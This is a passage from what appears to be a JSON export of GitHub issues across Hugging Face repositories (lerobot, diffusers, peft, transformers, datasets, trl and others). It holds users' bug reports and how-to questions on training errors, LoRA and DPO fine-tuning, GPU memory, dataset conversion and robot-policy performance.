'dataset_repo_id=lerobot/aloha_sim_insertion_human', 'env=aloha', 'env.task=AlohaInsertion-v0']\r\nTraceback (most recent call last):\r\n File \"/root/autodl-tmp/lerobot/lerobot/scripts/train.py\", line 677, in train_cli\r\n train(\r\n File \"/root/autodl-tmp/lerobot/lerobot/scripts/train.py\", line 354, in train\r\n policy = make_policy(\r\n File \"/root/autodl-tmp/lerobot/lerobot/common/policies/factory.py\", line 105, in make_policy\r\n policy = policy_cls(policy_cfg, dataset_stats)\r\n File \"\", line 26, in __init__\r\n File \"/root/autodl-tmp/lerobot/lerobot/common/policies/act/configuration_act.py\", line 158, in __post_init__\r\n if self.n_action_steps > self.chunk_size:\r\nTypeError: '>' not supported between instances of 'int' and 'dict'\r\n\r\nSet the environment variable HYDRA_FULL_ERROR=1 for a complete stack trace.\r\n\r\nAt this time, I also reported this error when I ran lerobot's act strategy. Do you know how to solve, thank you!", "url": "https://github.com/huggingface/lerobot/issues/555", "state": "closed", "labels": [ "enhancement", "question" ], "created_at": "2024-12-07T09:10:35Z", "updated_at": "2025-04-07T16:08:38Z", "user": "zhouzhq2021" }, { "repo": "huggingface/diffusers", "number": 10144, "title": "Why mochi diffusers video output is worse than mochi official code?", "body": "### Describe the bug\n\nThe quality of video is worse.\n\n### Reproduction\n\nRun the code with official prompt\n\n### Logs\n\n_No response_\n\n### System Info\n\ndiffusers@main\r\n\r\n\n\n### Who can help?\n\n@a-r-r-o-w @yiyixuxu ", "url": "https://github.com/huggingface/diffusers/issues/10144", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2024-12-07T05:53:57Z", "updated_at": "2025-01-07T15:38:38Z", "comments": 10, "user": "foreverpiano" }, { "repo": "huggingface/peft", "number": 2264, "title": "Guidance Needed on Two-Stage Fine-Tuning with LoRA(SFT and DPO) for Model Adaptation", "body": "# I am planning to perform a two-stage fine-tuning process and need some guidance on how to proceed.\r\n\r\n\r\n## First Stage\r\n\r\n1. Load Base Model: I start by loading the base model, qwen1.5 32B.\r\n2. Apply LoRA Fine-Tuning: I then apply LoRA fine-tuning to this base model and obtain a new model state.\r\n3. Save Adapter Model: This fine-tuned model state is saved as adapter_model.safetensors, named qwen1.5_lora_sft.\r\n## Second Stage\r\n\r\n1. Load the Model from the First Stage: I load both qwen1.5 32B and qwen1.5_lora_sft. It's crucial that qwen1.5_lora_sft integrates correctly with the base model qwen1.5 32B.\r\n2. . Continue Fine-Tuning: On this model, which already includes the LoRA adapter, I continue to apply LoRA and DPO for further fine-tuning.\r\n3. Save the New Adapter Model: After fine-tuning, I need to save the new adapter state, which includes adjustments from both the original LoRA and the new DPO.\r\n\r\n## My questions are:\r\n1. How to load the model from the base model(qwen1.5 32B) with the lora module qwen1.5_lora_sft\r\n2. How to Continue Fine-Tuning from the First Stage model, and save the lora model after dpo training with the base model(qwen1.5 32B) and only one qwen1.5_lora_sft_dpo module.( adapter_model_sft_dpo.safetensors)\r\n\r\n## What I had now\r\n1. base model, qwen1.5 32B model path\r\n2. qwen1.5_lora_sft module path: adapter_model.safetensors\r\n## What I Need \r\n1. qwen1.5_lora_sft _dpo module: adapter_model_sft_dpo.safetensors\r\n\r\n## This is \r\ntrain a base_model to get LoRA_weights_1\r\nbase_model_1 = merge(base_model and LoRA_weights_1)\r\ntrain base_model_1 to get LoRA_weights_2\r\nbase_model_2 = merge(base_model_1 and LoRA_weights_2)\r\n\r\nhow to split the base_model_2 into base_model and LoRA_weights_1_2\r\n\r\nThinks!", "url": "https://github.com/huggingface/peft/issues/2264", "state": "closed", "labels": [], "created_at": "2024-12-06T13:35:20Z", "updated_at": "2025-01-06T10:50:09Z", "comments": 5, "user": "none0663" }, { "repo": "huggingface/transformers", "number": 35118, "title": "How to load local transformers?", "body": "transformers==4.47.0.dev0\r\n \r\nI want to use my local transformers. And I tried to set `sys.insert(0,'xxx/transformers/src')` and `PYTHONPATH=xxx/transformers/src`, but they doesn't work.\r\n\r\nPLZ, tell me why.", "url": "https://github.com/huggingface/transformers/issues/35118", "state": "closed", "labels": [], "created_at": "2024-12-06T10:07:57Z", "updated_at": "2024-12-12T04:05:08Z", "user": "yiyexy" }, { "repo": "huggingface/lerobot", "number": 552, "title": "Rounding to int32 makes robot less precise. Do we have a solid reason for doing this?", "body": "### System Info\n\n```Shell\nLatest LeRobot. MacOS\n```\n\n\n### Information\n\n- [X] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n1) Run teleoperation\r\n2) Measure preciseness with rounding and without.\r\nat lerobot/common/robot_devices/robots/manipulator.py\r\n\r\n![image](https://github.com/user-attachments/assets/c7706edd-9284-4736-9600-6c4202af11d2)\r\n\n\n### Expected behavior\n\nSmooth movement", "url": "https://github.com/huggingface/lerobot/issues/552", "state": "closed", "labels": [ "bug", "question", "stale" ], "created_at": "2024-12-05T16:31:49Z", "updated_at": "2025-10-08T13:08:50Z", "user": "1g0rrr" }, { "repo": "huggingface/tokenizers", "number": 1696, "title": "How to determine the splicing logic in post_processor based on the sentence to be tokenized?", "body": "For example,\r\n```python\r\ndef post_processor(self, token_ids_0, token_ids_1=None):\r\n if \"cls\" in token_ids_0:\r\n return processors.TemplateProcessing(\r\n single=f\"{cls} $A {sep}\",\r\n pair=f\"{cls} $A {sep} $B {cls}\",\r\n special_tokens=[\r\n (cls, cls_token_id),\r\n (sep, sep_token_id),\r\n ],\r\n )\r\n else:\r\n return processors.TemplateProcessing(\r\n single=f\"{sep} $A {cls}\",\r\n pair=f\"{sep} $A {cls} $B {sep}\",\r\n special_tokens=[\r\n (cls, cls_token_id),\r\n (sep, sep_token_id),\r\n ],\r\n )\r\n```\r\nThx~", "url": "https://github.com/huggingface/tokenizers/issues/1696", "state": "open", "labels": [], "created_at": "2024-12-05T14:05:13Z", "updated_at": "2024-12-05T14:05:13Z", "user": "gongel" }, { "repo": "huggingface/peft", "number": 2262, "title": "Could you provide example code for AdaLoRA finetuning decoder-only model?", "body": "### Feature request\n\nThe current [example of AdaLoRA](https://github.com/huggingface/peft/blob/b2922565c4c4445706a87cf7b988c828b451fe61/examples/conditional_generation/peft_adalora_seq2seq.py) is on **facebook/bart-base**. Since AdaLoRA requires hand-crafted calculations on loss, would it be possible to provide me some hints on how can this be done when it comes to decoder-only (e.g., Llama-Instruct) LM?\r\n\r\nSpecificially, I would like to mask out the loss calculation on the instruction part or system prompt, focusing only on the assistant response.\n\n### Motivation\n\nAdaLoRA requires hand-crafted calculations on loss, which becomes complex when desired to mask out some system/instructino tokens.\n\n### Your contribution\n\nN.A.", "url": "https://github.com/huggingface/peft/issues/2262", "state": "closed", "labels": [], "created_at": "2024-12-05T12:03:31Z", "updated_at": "2025-01-18T15:03:29Z", "comments": 4, "user": "SpeeeedLee" }, { "repo": "huggingface/diffusers", "number": 10129, "title": " Does StableDiffusion3 have an image2image pipeline with ControlNet?", "body": "I want to use `ControlNet` with `StableDiffusion3`, providing a prompt, an original image, and a control image as inputs. However, I found that the `StableDiffusion3ControlNetPipeline` only supports prompts and control images as inputs. The `StableDiffusionControlNetImg2ImgPipeline` allows for providing a prompt, an original image, and a control image simultaneously, but it is not compatible with the `StableDiffusion3` model. Is there a `StableDiffusion3ControlNetImg2ImgPipeline` available?\r\n", "url": "https://github.com/huggingface/diffusers/issues/10129", "state": "closed", "labels": [ "New pipeline/model", "contributions-welcome" ], "created_at": "2024-12-05T09:40:03Z", "updated_at": "2025-01-02T20:02:33Z", "comments": 1, "user": "ZHJ19970917" }, { "repo": "huggingface/diffusers", "number": 10128, "title": "Is there any plan to support fastercache?", "body": "Expect to support fastercache, https://github.com/Vchitect/FasterCache", "url": "https://github.com/huggingface/diffusers/issues/10128", "state": "closed", "labels": [ "wip", "performance" ], "created_at": "2024-12-05T09:11:19Z", "updated_at": "2025-03-21T04:05:06Z", "comments": 4, "user": "songh11" }, { "repo": "huggingface/datasets", "number": 7306, "title": "Creating new dataset from list loses information. (Audio Information Lost - either Datatype or Values).", "body": "### Describe the bug\r\n\r\nWhen creating a dataset from a list of datapoints, information is lost of the individual items.\r\n\r\nSpecifically, when creating a dataset from a list of datapoints (from another dataset). Either the datatype is lost or the values are lost. See examples below. \r\n\r\n-> What is the best way to create a dataset from a list of datapoints?\r\n\r\n---\r\ne.g.:\r\n**When running this code:**\r\n```python\r\nfrom datasets import load_dataset, Dataset\r\ncommonvoice_data = load_dataset(\"mozilla-foundation/common_voice_17_0\", \"it\", split=\"test\", streaming=True)\r\ndatapoint = next(iter(commonvoice_data))\r\nout = [datapoint]\r\nnew_data = Dataset.from_list(out) #this loses datatype information\r\nnew_data2= Dataset.from_list(out,features=commonvoice_data.features) #this loses value information\r\n```\r\n\r\n**We get the following**:\r\n---\r\n1. `datapoint`: (the original datapoint)\r\n```\r\n'audio': {'path': 'it_test_0/common_voice_it_23606167.mp3', 'array': array([0.00000000e+00, 0.00000000e+00, 0.00000000e+00, ...,\r\n 2.21619011e-05, 2.72628222e-05, 0.00000000e+00]), 'sampling_rate': 48000}\r\n ```\r\nOriginal Dataset Features:\r\n```\r\n>>> commonvoice_data.features\r\n'audio': Audio(sampling_rate=48000, mono=True, decode=True, id=None)\r\n```\r\n - Here we see column \"audio\", has the proper values (both `path` & and `array`) and has the correct datatype (Audio).\r\n\r\n \r\n ----\r\n 2. new_data[0]:\r\n```\r\n# Cannot be printed (as it prints the entire array).\r\n```\r\nNew Dataset 1 Features:\r\n```\r\n>>> new_data.features\r\n'audio': {'array': Sequence(feature=Value(dtype='float64', id=None), length=-1, id=None), 'path': Value(dtype='string', id=None), 'sampling_rate': Value(dtype='int64', id=None)}\r\n```\r\n - Here we see that the column \"audio\", has the correct values, but is not the Audio datatype anymore.\r\n\r\n---\r\n3. new_data2[0]:\r\n```\r\n'audio': {'path': None, 'array': array([0., 0., 0., ..., 0., 0., 0.]), 'sampling_rate': 48000},\r\n```\r\nNew Dataset 2 Features:\r\n```\r\n>>> new_data2.features\r\n'audio': Audio(sampling_rate=48000, mono=True, decode=True, id=None),\r\n```\r\n - Here we see that the column \"audio\", has the correct datatype, but all the array & path values were lost!\r\n\r\n\r\n\r\n### Steps to reproduce the bug\r\n\r\n## Run:\r\n```python\r\nfrom datasets import load_dataset, Dataset\r\ncommonvoice_data = load_dataset(\"mozilla-foundation/common_voice_17_0\", \"it\", split=\"test\", streaming=True)\r\ndatapoint = next(iter(commonvoice_data))\r\nout = [datapoint]\r\nnew_data = Dataset.from_list(out) #this loses datatype information\r\nnew_data2= Dataset.from_list(out,features=commonvoice_data.features) #this loses value information\r\n```\r\n\r\n\r\n\r\n\r\n\r\n### Expected behavior\r\n\r\n## Expected:\r\n```datapoint == new_data[0]```\r\n\r\nAND\r\n\r\n```datapoint == new_data2[0]```\r\n\r\n### Environment info\r\n\r\n- `datasets` version: 3.1.0\r\n- Platform: Linux-6.2.0-37-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- `huggingface_hub` version: 0.26.2\r\n- PyArrow version: 15.0.2\r\n- Pandas version: 2.2.2\r\n- `fsspec` version: 2024.3.1", "url": "https://github.com/huggingface/datasets/issues/7306", "state": "open", "labels": [], "created_at": "2024-12-05T09:07:53Z", "updated_at": "2024-12-05T09:09:38Z", "comments": 0, "user": "ai-nikolai" }, { "repo": "huggingface/lerobot", "number": 549, "title": "Low accuracy for act policy on pushT env", "body": "The highest success rate is 44%, as n_decoder_layers=7. Are there any other tricks for this?", "url": "https://github.com/huggingface/lerobot/issues/549", "state": "closed", "labels": [ "question", "policies", "stale" ], "created_at": "2024-12-05T06:18:06Z", "updated_at": "2025-10-19T02:32:37Z", "user": "KongCDY" }, { "repo": "huggingface/Google-Cloud-Containers", "number": 128, "title": "Can we use Multi-LORA CPU", "body": "Hi,\r\n\r\nIm currently following this doc: https://huggingface.co/docs/google-cloud/en/examples/gke-tgi-multi-lora-deployment\r\n\r\nAfter got a bug: \"Can\u2019t scale up due to exceeded quota\" and do some research, I suspect that my free trial (300$) account is not able to increase GPU quota (even I have activated my account to not be trial anymore and have to contact sale)\r\n\r\nIs there anyway I can run this with cpu instead.\r\n\r\nThank you", "url": "https://github.com/huggingface/Google-Cloud-Containers/issues/128", "state": "open", "labels": [ "question" ], "created_at": "2024-12-05T05:42:51Z", "updated_at": "2024-12-12T10:06:43Z", "user": "AndrewNgo-ini" }, { "repo": "huggingface/peft", "number": 2260, "title": "Is it possible to support the transformer engine when using Lora in Megatron?", "body": "### Feature request\n\nI am currently using the Megatron framework and want to use Lora for training. I saw that the Megatron format is supported at https://github.com/huggingface/peft/blob/main/src/peft/tuners/lora/tp_layer.py RowParallelLinear and ColumnParallelLinear do the adaptation. But if I use the transformer engine, the corresponding TELayerNormColumnParallelLinear and TERowParallelLinear will not be adapted.\n\n### Motivation\n\nThis will better support Megatron framework using LoRA.\n\n### Your contribution\n\nI don't have a PR.", "url": "https://github.com/huggingface/peft/issues/2260", "state": "closed", "labels": [], "created_at": "2024-12-05T03:24:15Z", "updated_at": "2025-01-12T15:03:29Z", "comments": 3, "user": "liulong11" }, { "repo": "huggingface/diffusers", "number": 10120, "title": "memory consumption of dreambooth+SD3", "body": "Hi, I am running dreambooth SD3 with a single A100 GPU, I reduced resolution to 256; but it still need more memory than a single A100 has? I am wondering is this huge memory consumption normal?\r\n\r\n```\r\n!python train_dreambooth_sd3.py \\\r\n --pretrained_model_name_or_path=\"stabilityai/stable-diffusion-3-medium-diffusers\" \\\r\n --instance_data_dir=\"erhu\" \\\r\n --output_dir=\"trained-sd3\" \\\r\n --mixed_precision=\"fp16\" \\\r\n --instance_prompt=\"a photo of erhu\" \\\r\n --resolution=256 \\\r\n --train_batch_size=1 \\\r\n --gradient_accumulation_steps=4 \\\r\n --learning_rate=1e-4 \\\r\n --report_to=\"wandb\" \\\r\n --lr_scheduler=\"constant\" \\\r\n --lr_warmup_steps=0 \\\r\n --max_train_steps=300 \\\r\n --validation_prompt=\"A photo of erhu on the grass\" \\\r\n --validation_epochs=25 \\\r\n --use_8bit_adam \\\r\n --seed=\"0\" \\\r\n --push_to_hub\r\n```\r\n`torch.OutOfMemoryError: CUDA out of memory. Tried to allocate 36.00 MiB. GPU 0 has a total capacity of 39.56 GiB of which 2.81 MiB is free. Process 16368 has 39.55 GiB memory in use. Of the allocated memory 38.05 GiB is allocated by PyTorch, and 1021.72 MiB is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True to avoid fragmentation. See documentation for Memory Management `\r\nThanks", "url": "https://github.com/huggingface/diffusers/issues/10120", "state": "closed", "labels": [ "bug", "stale", "training" ], "created_at": "2024-12-04T19:39:04Z", "updated_at": "2025-01-27T01:30:18Z", "comments": 5, "user": "KolvacS-W" }, { "repo": "huggingface/diffusers", "number": 10112, "title": "Detail-Daemon diffusers", "body": "**Describe the solution you'd like.**\r\nDetail-Daemon: https://github.com/Jonseed/ComfyUI-Detail-Daemon\r\n\r\nHow to implement Detail-Daemon in diffusers, as seen in https://github.com/Jonseed/ComfyUI-Detail-Daemon. Will there be a better official component in the future?", "url": "https://github.com/huggingface/diffusers/issues/10112", "state": "open", "labels": [ "wip", "consider-for-modular-diffusers" ], "created_at": "2024-12-04T09:14:39Z", "updated_at": "2025-01-03T18:01:24Z", "comments": 10, "user": "NicholasCao" }, { "repo": "huggingface/lerobot", "number": 547, "title": "How to make a custom LeRobotDataset with v2?", "body": "Hi folks, thanks for the amazing open source work!\r\n\r\nI am trying to make a custom dataset to use with the LeRobotDataset format.\r\n\r\nThe readme says to copy the example scripts here which I've done, and I have a working format script of my own.\r\n\r\nhttps://github.com/huggingface/lerobot/blob/8e7d6970eaf5a64b8af6ec45586d201b8ca9ef16/README.md?plain=1#L323\r\n\r\nbut when it comes time to create the dataset, the `push_dataset_to_hub.py` uses `LeRobotDataset.from_preloaded` which is no longer supported in [dataset V2](https://github.com/huggingface/lerobot/pull/461)\r\n\r\nhttps://github.com/huggingface/lerobot/blob/8e7d6970eaf5a64b8af6ec45586d201b8ca9ef16/lerobot/scripts/push_dataset_to_hub.py#L216\r\n\r\nSo I'm just wondering what the proper way of loading your own custom local dataset is? \r\n\r\nThank you in advance for your help!", "url": "https://github.com/huggingface/lerobot/issues/547", "state": "closed", "labels": [ "question", "dataset", "stale" ], "created_at": "2024-12-04T08:00:19Z", "updated_at": "2025-10-08T08:28:34Z", "user": "alik-git" }, { "repo": "huggingface/lerobot", "number": 545, "title": "Poor success rate in complex scenarios", "body": "Hi I used Moss robot to play with and train ACT policy, when it comes to one lego piece, it can finish grabbing task at high success rate after recording 50+ episodes with different pose & location variants, but generalization on multi-piece random location is not promising.\r\n\r\nWhen I started to add complexity (for example 6 pieces with different colors like the picture below), and place the lego pieces a little bit randomly, record one episode continuously until all the pieces are grabbed (other than 1 piece 1 episode). furthermore, were recorded with order\r\n![IMG_4681 HEIC](https://github.com/user-attachments/assets/dbe58ebc-0690-4563-ab1d-cf0660305611)\r\n\r\nHere is what I found:\r\n1. The trained policy can not work if the gripping sequence is randomized, in other words it has to keep a fixed spacial order e.g. from upper left to down right.\r\n2. The trained policy can not work if the [location, color, pose] combination was not seen in training dataset, especially location combos \r\n3. At first I suspected only iPhone and Mac fixed cameras can not give enough depth perception, so I bought a wide-angle USB camera mounted it on the gripper, as a result success rate didn't get higher. \r\n![20241204141608](https://github.com/user-attachments/assets/346a6c22-7516-4854-ac1f-5d7029af5336)\r\n\r\n4. Enlarging dataset size to 120+ episodes didn't give obvious change.\r\n\r\n\r\n\r\n\r\nI was wondering how to improve this task, is the method I used to record data wrong or due to the generalization of ACT is limited? \r\n\r\nLooking forward to hearing answers or experience", "url": "https://github.com/huggingface/lerobot/issues/545", "state": "closed", "labels": [ "question", "policies", "stale" ], "created_at": "2024-12-04T06:20:31Z", "updated_at": "2025-10-08T08:28:45Z", "user": "mydhui" }, { "repo": "huggingface/frp", "number": 14, "title": "where is the code of frpc-gradio-0.3", "body": "", "url": "https://github.com/huggingface/frp/issues/14", "state": "closed", "labels": [], "created_at": "2024-12-04T05:37:34Z", "updated_at": "2025-03-11T00:55:39Z", "user": "BoyuanJiang" }, { "repo": "huggingface/peft", "number": 2255, "title": "Is this the right way to check whether a model has been trained as expected?", "body": "I'd like to check whether my PEFT model has been trained as intended, i.e. whether the PEFT weights have changed, but not the base weights. The following code works, but I'm sure a PEFT specialist will suggest a better way.\r\n\r\n```python\r\nimport tempfile\r\n\r\nimport torch\r\nfrom datasets import load_dataset\r\nfrom peft import LoraConfig, get_peft_model\r\nfrom transformers import AutoModelForCausalLM\r\n\r\nfrom trl import SFTConfig, SFTTrainer\r\n\r\n\r\n# Get the base model\r\nmodel_id = \"trl-internal-testing/tiny-Qwen2ForCausalLM-2.5\"\r\nmodel = AutoModelForCausalLM.from_pretrained(model_id)\r\n\r\n# Get the base model parameter names\r\nbase_param_names = [f\"base_model.model.{n}\" for n, _ in model.named_parameters()]\r\n\r\n# Turn the model into a peft model\r\nlora_config = LoraConfig()\r\nmodel = get_peft_model(model, lora_config)\r\n\r\n# Get the dataset\r\ndataset = load_dataset(\"trl-internal-testing/zen\", \"standard_language_modeling\", split=\"train\")\r\n\r\nwith tempfile.TemporaryDirectory() as tmp_dir:\r\n # Initialize the trainer\r\n training_args = SFTConfig(output_dir=tmp_dir, report_to=\"none\")\r\n trainer = SFTTrainer(args=training_args, model=model, train_dataset=dataset)\r\n\r\n # Save the initial parameters to compare them later\r\n previous_trainable_params = {n: param.clone() for n, param in trainer.model.named_parameters()}\r\n\r\n trainer.train()\r\n\r\n # Check the peft params have changed and the base model params have not changed\r\n for n, param in previous_trainable_params.items():\r\n new_param = trainer.model.get_parameter(n)\r\n if n in base_param_names: # We expect the base model parameters to be the same\r\n if not torch.allclose(param, new_param):\r\n print(f\"Parameter {n} has changed, but it should not have changed\")\r\n elif \"base_layer\" not in n: # We expect the peft parameters to be different (except for the base layer)\r\n if torch.allclose(param, new_param):\r\n print(f\"Parameter {n} has not changed, but it should have changed\")\r\n```", "url": "https://github.com/huggingface/peft/issues/2255", "state": "closed", "labels": [], "created_at": "2024-12-03T17:36:00Z", "updated_at": "2024-12-04T12:01:37Z", "comments": 5, "user": "qgallouedec" }, { "repo": "huggingface/peft", "number": 2251, "title": "a guide to add a new fine-tuning method in the doc", "body": "### Feature request\n\nHello, I am a researcher in the finetune area. Can you publish a guide to add a new fine-tuning method in the doc? I think researchers like me are glad to experiment their methods based on this repo.\n\n### Motivation\n\nResearchers like me are glad to experiment their methods based on this repo, but don't know how to add.\n\n### Your contribution\n\nYes, but after verifying the feasibility of my method.", "url": "https://github.com/huggingface/peft/issues/2251", "state": "closed", "labels": [], "created_at": "2024-12-03T13:46:02Z", "updated_at": "2024-12-04T02:12:35Z", "comments": 2, "user": "YF-T" }, { "repo": "huggingface/diffusers", "number": 10076, "title": "Do we have any script covert from hf format to orginal format?", "body": "**Is your feature request related to a problem? Please describe.**\r\nscripts/convert_cogvideox_to_diffusers.py\r\nin this script, we can convert cogvideox -> diffusers. Do we have the opposite script?\r\n\r\ncc @yiyixuxu \r\n", "url": "https://github.com/huggingface/diffusers/issues/10076", "state": "open", "labels": [ "good first issue", "contributions-welcome", "conversion script" ], "created_at": "2024-12-02T07:49:34Z", "updated_at": "2024-12-02T18:22:50Z", "comments": 1, "user": "foreverpiano" }, { "repo": "huggingface/trl", "number": 2424, "title": "How to calculate the loss of multi-turn dialogue training data?", "body": "In a single data entry containing multiple turns of dialogue, abbreviated as Q1 + A1 + Q2 + A2, does this project calculate the loss only for the last answer of the multi-turn dialogue, or for each answer?", "url": "https://github.com/huggingface/trl/issues/2424", "state": "closed", "labels": [ "\u2753 question", "\ud83c\udfcb SFT" ], "created_at": "2024-12-02T07:47:17Z", "updated_at": "2025-01-20T02:47:34Z", "user": "NUMB1234" }, { "repo": "huggingface/diffusers", "number": 10074, "title": "how to install diffusers 0.32.0", "body": "FluxFillPipeline Function need =0.32.0 But I don't know how to install it, can anyone help me? Thanks in advance", "url": "https://github.com/huggingface/diffusers/issues/10074", "state": "closed", "labels": [], "created_at": "2024-12-02T07:05:24Z", "updated_at": "2024-12-02T19:11:34Z", "user": "babyta" }, { "repo": "huggingface/diffusers", "number": 10070, "title": "Xformers info , memory efficient atttention unavailable", "body": "### Describe the bug\r\n\r\nI just started learning Stable Diffuision on Win11. After I installed xformers, I found several memory_efficient_attention string is unavailable. Is it possible to make them available? Thanks for any help.\r\n\r\n### Reproduction\r\n\r\nxFormers 0.0.28.post3\r\nmemory_efficient_attention.ckF: unavailable\r\nmemory_efficient_attention.ckB: unavailable\r\nmemory_efficient_attention.ck_decoderF: unavailable\r\nmemory_efficient_attention.ck_splitKF: unavailable\r\nmemory_efficient_attention.cutlassF-pt: available\r\nmemory_efficient_attention.cutlassB-pt: available\r\nmemory_efficient_attention.fa2F@v2.6.3-24-gbdf733b: available\r\nmemory_efficient_attention.fa2B@v2.6.3-24-gbdf733b: available\r\nmemory_efficient_attention.fa3F@0.0.0: unavailable\r\nmemory_efficient_attention.fa3B@0.0.0: unavailable\r\nmemory_efficient_attention.triton_splitKF: available\r\nindexing.scaled_index_addF: available\r\nindexing.scaled_index_addB: available\r\nindexing.index_select: available\r\nsequence_parallel_fused.write_values: available\r\nsequence_parallel_fused.wait_values: available\r\nsequence_parallel_fused.cuda_memset_32b_async: available\r\nsp24.sparse24_sparsify_both_ways: available\r\nsp24.sparse24_apply: available\r\nsp24.sparse24_apply_dense_output: available\r\nsp24._sparse24_gemm: available\r\nsp24._cslt_sparse_mm_search@0.0.0: available\r\nsp24._cslt_sparse_mm@0.0.0: available\r\nswiglu.dual_gemm_silu: available\r\nswiglu.gemm_fused_operand_sum: available\r\nswiglu.fused.p.cpp: available\r\nis_triton_available: True\r\npytorch.version: 2.5.1+cu124\r\npytorch.cuda: available\r\ngpu.compute_capability: 8.9\r\ngpu.name: NVIDIA GeForce RTX 4070\r\ndcgm_profiler: unavailable\r\nbuild.info: available\r\nbuild.cuda_version: 1204\r\nbuild.hip_version: None\r\nbuild.python_version: 3.10.11\r\nbuild.torch_version: 2.5.1+cu124\r\nbuild.env.TORCH_CUDA_ARCH_LIST: 6.0+PTX 7.0 7.5 8.0+PTX 9.0a\r\nbuild.env.PYTORCH_ROCM_ARCH: None\r\nbuild.env.XFORMERS_BUILD_TYPE: Release\r\nbuild.env.XFORMERS_ENABLE_DEBUG_ASSERTIONS: None\r\nbuild.env.NVCC_FLAGS: -allow-unsupported-compiler\r\nbuild.env.XFORMERS_PACKAGE_FROM: wheel-v0.0.28.post3\r\nbuild.nvcc_version: 12.4.131\r\nsource.privacy: open source\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\nWin11, Python 3.10.6,pytorch 2.5.1+cu124, xFormers 0.0.28.post3, triton==3.0.0\r\n\r\n### Who can help?\r\n\r\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/10070", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-12-01T16:14:21Z", "updated_at": "2025-01-01T15:03:09Z", "comments": 1, "user": "Stareshine" }, { "repo": "huggingface/Google-Cloud-Containers", "number": 126, "title": "Deployment error on GKE", "body": "Hello!\r\nI deployed Gemma 2 2b it on GKE with autopilot mode following these instructions https://cloud.google.com/kubernetes-engine/docs/tutorials/serve-gemma-gpu-tgi#autopilot. There's this error Node scale up in zones us-central1-c associated with this pod failed: GCE quota exceeded. Pod is at risk of not being scheduled. I checked quota there's enough GPU. However the pod is in pending state.", "url": "https://github.com/huggingface/Google-Cloud-Containers/issues/126", "state": "closed", "labels": [ "question" ], "created_at": "2024-12-01T14:09:29Z", "updated_at": "2025-01-07T08:39:07Z", "user": "piksida" }, { "repo": "huggingface/lerobot", "number": 538, "title": "questions about load dataset for localhost, make own policy and use headless eval mode", "body": "Hello, I'm trying to download a data set on hugging face to the local and then call this data set from the local. For example, 'aloha_sim_insertion_scripted_image' , its format is many 'episode_000000.parquet' files . Then how to load this format by LeRobotDataset() func or other ways?\r\n\r\nSecond, I want to create my own policy. After I parse the code framework, I think I may need to create my policy code file by mimicking the following files:\r\n+ lerobot/common/policies/act/configuration_act.py\r\n+ lerobot/common/policies/act/modeling_act.py\r\nHowever, I am having some difficulties in making my own policy now, and I want to create a new policy to implement my idea, which is to introduce the concept of comparative learning. That is to say, the policy enables the agent to learn the correct samples and stay away from the wrong samples. I would like to ask you what should be modified to complete this idea.\r\n\r\nI really need examples of this, and it would be very helpful if you could give me detailed advice!\r\n\r\nFinally, my server is headless, which means that when evaluating a policy, there is no way to call mujujo to view the evaluation, so can our code framework support headless mode and save the evaluation video?\r\n\r\nAs a new researcher in this field, it would be great if I could further communicate with you about the above issues. Thank you very much!\r\n\r\nBest wishes : )", "url": "https://github.com/huggingface/lerobot/issues/538", "state": "closed", "labels": [ "question", "stale" ], "created_at": "2024-12-01T03:32:06Z", "updated_at": "2025-10-19T02:32:41Z", "user": "zhouzhq2021" }, { "repo": "huggingface/lerobot", "number": 536, "title": "How auto calibration works", "body": "Is there any details about run_arm_auto_calibration_moss and run_arm_auto_calibration_so100 we can refer? I read the code but couldn't fully understand. \r\n\r\nWhen should we use auto_calibration, instead of the manual calibration calculating the homing_offset of the rotated (90d) pose?\r\n\r\nWhat to check whether my understanding is correct: for manual calibration, the homing offset include 2 terms, 1) the true offset causing by motor installation, 2) human bias due to manually rotate the motor. If correct, is there a way to also remove the second term? Considering using multiple robots for data collection, guess removing term (2) is required.", "url": "https://github.com/huggingface/lerobot/issues/536", "state": "closed", "labels": [ "question", "robots", "stale" ], "created_at": "2024-11-30T18:04:23Z", "updated_at": "2025-10-08T08:37:24Z", "user": "wzds2015" }, { "repo": "huggingface/accelerate", "number": 3269, "title": "\ud83e\udd28Question: What if model has float16 dtype and `mixed_precision` is set to fp16 as well?", "body": "As the title:\r\n\r\n**\ud83e\udd28Question: What if model has float16 dtype and `mixed_precision` is set to fp16 as well?**\r\n\r\n- Will it computate in original float16? Like Auto-Mixed-Precision never exist\r\n- or some modules, which are easy to overflow(e.g. BatchNorm, LayerNorm), will be upcasted to float32, as AMP fp32->fp16 does?\r\n\r\nCould someone please help me with this question? \u2764", "url": "https://github.com/huggingface/accelerate/issues/3269", "state": "closed", "labels": [], "created_at": "2024-11-29T17:55:58Z", "updated_at": "2025-01-07T15:33:26Z", "user": "townwish4git" }, { "repo": "huggingface/chat-macOS", "number": 36, "title": "Document how to download and install a local model", "body": "1st, thanks very much for this work!\r\nI'm a bit of nube here.\r\n\r\nThe 'Get' button takes you to web page for the example, however chat-macOS instruction are not part of the options. And also where do you place the downloaded model for the \"add +\" option and where do the models go? Is there a way to configure where models are stored?\r\n\r\nThanks!\r\n\r\n", "url": "https://github.com/huggingface/chat-macOS/issues/36", "state": "open", "labels": [], "created_at": "2024-11-29T17:18:43Z", "updated_at": "2024-11-29T17:18:43Z", "user": "deepcoder" }, { "repo": "huggingface/diffusers", "number": 10055, "title": "Training script for a Controlnet based on SD3 does not work", "body": "### Describe the bug\n\nHi @sayakpaul and all others :)\r\n\r\n\r\nThe training script for a Control-net based on Stable Diffusion 3 seems to not work.\r\n\r\n**RuntimeError: Given groups=1, weight of size [1536, 17, 2, 2], expected input[4, 16, 64, 64] to have 17 channels, but got 16 channels instead**\r\n\r\n\r\n\r\nI tried to follow the documentation on how to train a control net based on SD3.\r\nI used a custom dataset that I also used to train a control net based on SD1.5. \r\n\r\nOnce i run the script. I receive a tensors channel do not match error.\r\n\n\n### Reproduction\n\n!accelerate launch train_controlnet_sd3.py \\\r\n --pretrained_model_name_or_path=\"stabilityai/stable-diffusion-3-medium-diffusers\" \\\r\n --output_dir=\"/home/xxx/models/v1/cn-stablediff-v3_out\" 